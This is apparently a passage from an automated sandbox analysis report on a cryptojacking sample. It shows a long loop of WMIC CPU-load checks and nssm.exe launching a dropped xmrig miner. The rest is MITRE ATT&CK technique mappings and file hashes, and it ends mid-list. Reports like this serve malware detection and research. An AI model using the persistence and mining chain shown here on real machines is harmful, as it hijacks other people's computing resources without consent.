- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5052
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2660
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2644
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2532
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3116
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2340
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5100
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4604
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:424
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2756
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4976
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4684
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3216
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4620
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2828
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4692
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2884
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4188
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3764
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4972
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1592
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4708
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5024
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4212
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2912
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1860
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:932
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3096
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1256
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4388
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1692
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3576
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4956
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3684
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:192
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1432
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2100
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2656
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2276
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4196
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2660
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:876
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2532
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4376
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5100
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4244
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2256
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1580
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4392
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2748
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4616
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4988
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3392
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1696
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2760
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4360
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4272
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2348
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:596
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3872
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2888
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4756
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4300
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3720
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5108
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4564
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1628
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4172
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4280
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:764
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3088
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1632
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4676
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4652
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:308
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3192
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2952
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:516
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2272
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2660
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1772
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4752
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4544
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1868
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4312
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4452
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2172
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4936
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2280
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4928
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2772
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1548
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2828
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:216
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2884
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4776
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3952
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4744
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:700
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1108
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4100
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3808
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3032
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:520
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4564
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1504
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4172
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3544
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1380
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4952
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:64
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3332
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4968
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3904
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1932

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:656
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2064

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f438776115b7aa459b206705af6fd4b8

SHA1
1cf86b3926dfacaa39c61d1064426253bb6d0791

SHA256
83c950426e975419f7b40e53d769db31d81fd7c4a267897ec78825f6654271cd

SHA512
26c8a0d01ec1550214f8884192ee471a75d3726e783e5d739cd4b4fe1f268d026edc5f8e2569456bfc7a352c090ff2ef77f604e796cc2d112f2fe5cdbc85293e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
375b315760a3cf4496904514cd3f1228

SHA1
6c328b5d482353a4af2e56e918a18154400475a3

SHA256
4b3b6da59ca8345269842c3d83f24f4ece5c9df9e2e4b37d8e4bbd4657b422b9

SHA512
0aa48d13791a7b7cb6283f97d231507da493b267e422e2c310fe153e3d4c292075412f5abf7e4fa58ce1d1d65dad04458c8774f0e04e80e138370012b6aad11f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3e4778923dc487a3e200b48d6ef5623e

SHA1
61580919f4bf27bec9309522783f0e3db5620595

SHA256
952875bfc1565977d9214393aac649c21ec9cb023a542461dbe3d472dc7597c4

SHA512
96e5d2f802f57d6ddff0c869bf334abbb213bafd73db6965d5e336a830add31c5d883739259d1fbf9c40faa56c847bd37cdf6acf5973411a703c047982db4db0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
58a81dac0d91919fcc5f82393d1300a3

SHA1
ec205b1c7cfac34b1b38447724e0160e55fed10c

SHA256
9afb6a875a3bb16f1923d0ecaa89c632a1ab8c615128496504f941721dda9980

SHA512
a7f88dd735fb6708062ad336fc14f14e559c30a16165e9f5dec33dbc81613f7e78ecb2b1d78dceebb2e11bb035a6c30a5db910de43d7ecc308cd5ef0da72f789

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2c9fb25b91f762198801d521568c853a

SHA1
c359a928006ada0ea939a8807cb41afc52485897

SHA256
8dc239b475fa592f14ecdd4f2719416e7a7dca6c528b82090d4b8417f2b32487

SHA512
c263eabb4ce78b282a608c7fcb410bc9224951e19f7b13da2d3d5b35451d72fa9c8fbb58b787cbe65cb5dc25877771ced9000c5f04ae777e722d5252827309e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f5a8a821673d37307e0e4cdcf8dacdcf

SHA1
26d2aa442959a6025befe8db0b71a498ca3855a8

SHA256
13d349b2fdaa3eb4e95c0d5cd114877c72c793d3d3e03a4fd233ee36dbe14a0e

SHA512
f9336b69f64d4b7c2db5badfcd67281863435b006041f6e1663b44155318f5b1faa04780eacf4b52099bef1f69e363ebb833087e943f3b8e3e406cfac18b3236

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
abed1045fa418dbc48b05499ca7543ce

SHA1
82715ec4041ff3acc8078a240ec90e47c5a240dc

SHA256
8645162294c14c5bb54954311624222e0383cb561a61461ead915d7848ae7d75

SHA512
7fd30c53ff8f6ce55614e82be7fd11930050d1166689b4151f0ab58933514bad852defed65d43800dda5aeec296c959d1b8604e0b6871f06ed63828f30a649bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f78b2bc5aec0418505ed50f57f09111a

SHA1
f015397adab5abe64b617ccd0e62e26c3eb937c0

SHA256
3d12d62dedac0ef94408d5e89f831a8d132180884acaec58dc4cd6265c08a666

SHA512
8f159723aeeec6803571b217b116aa991804ba371a9c360b67f1a319a906b47458ccbb6ea03ddc4ddfb940b4c702e19864d6cca9b64bbaf221d49ca5f8b0f6a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3fcd357b1916e0f5602cc9eaf0e8ef32

SHA1
c80e6765e5c4b0ab7013146740ebbd4642a52085

SHA256
65464976bf4a1e952cad938a2052d5054951b9e2f3dfe03e239e94af2391111e

SHA512
6f1c502025050b306618b2f6b39273e6bccc6e6741c662df8460ae726109915f3c5def3dacbc1a346acec9c51e774353f5479de4b5415c2e1af4f070395e1386

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
012a7dd99543f79ae82a184d1b99a89f

SHA1
4b52b5ffb5d3aeb84ec345f4b41a7e9e1b45f587

SHA256
4937349753a1c2d8f1e81787efb2adcf986c7bf65af606c9e85d76e05b934f38

SHA512
88358584c0ed5b439ad0b51af8b3c3647506faffeb0c880a6a9dd634bf798ba3506de43f954d26aea84798d47d814648fc5caf1fe20c0face9912aa8f84b29a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8681c048196539e682f7d63ac13a8494

SHA1
a3241520913f44662f60aea5a6873c7739f9ecdf

SHA256
0a6049b591f9247f4ac65dde23f8677e802468df6d0707606e7ed7b73a362e34

SHA512
258f2d34c2311e5edb4c1fd43fe674a1486c22fa922993de6d43ff1212aa071375d83ab4e562c853c96c87f74467cd7ebcec7e5423628af6fa98c8b205205a3f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f3d9a7549a38225cbe39a1e33bb3d949

SHA1
424dbcd3a07882a1e4c6b539e187f06c09e2f28b

SHA256
5ecb2f5b50c3841cc9fd2aa67cb84784f4da3ed718e607440c95e7f39d3f89e9

SHA512
b995f88c842f89252d2a63d45cf6fa9b31b4bf6f61358ea639cb0ca8c14c2dc118a352b671fe70a967621c0a63392b1d30c45d26f70b32c5da7acbee3ce89d00

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gxetvboh.rtg.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp7157.tmp.bat

Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
67099c11aee7715195c370daf8713cf6

SHA1
4ffe1365749d5828225c3c91efbf37524f6b4574

SHA256
91a469ac7711ea2098eeed42b648548c51a109b83fd54fac53b643a4d9f127c8

SHA512
4a4351749e0a6dfb211196af3eb892486c3df501ec6923cad96c16605e40cca3febaf908ece586e36a55b2945141140c18c0359badd0d609999aed747221145b

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
e4499a2d2a34e1d5b10835302f797678

SHA1
1b2e59b72c3557c44ea2b7f87ea6eb364644d7ee

SHA256
8566d085121a26714a098c61ef75fbb097fd90c5ade79b39a61416fc827eaa31

SHA512
757e7b1b1fabfb196d305f38ad85a8975d4830c3d37dbcd0c0ae41ac3ffb3cc38b80c2e91d8b9c0f1520b1dca9ecb718c3cb1217a7a65d36c3e34b124f2e3498

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
98181d8f6601d0546e9ec5d4fb6a000b

SHA1
804809e227b82fe6621737cbc509db2335303a1d

SHA256
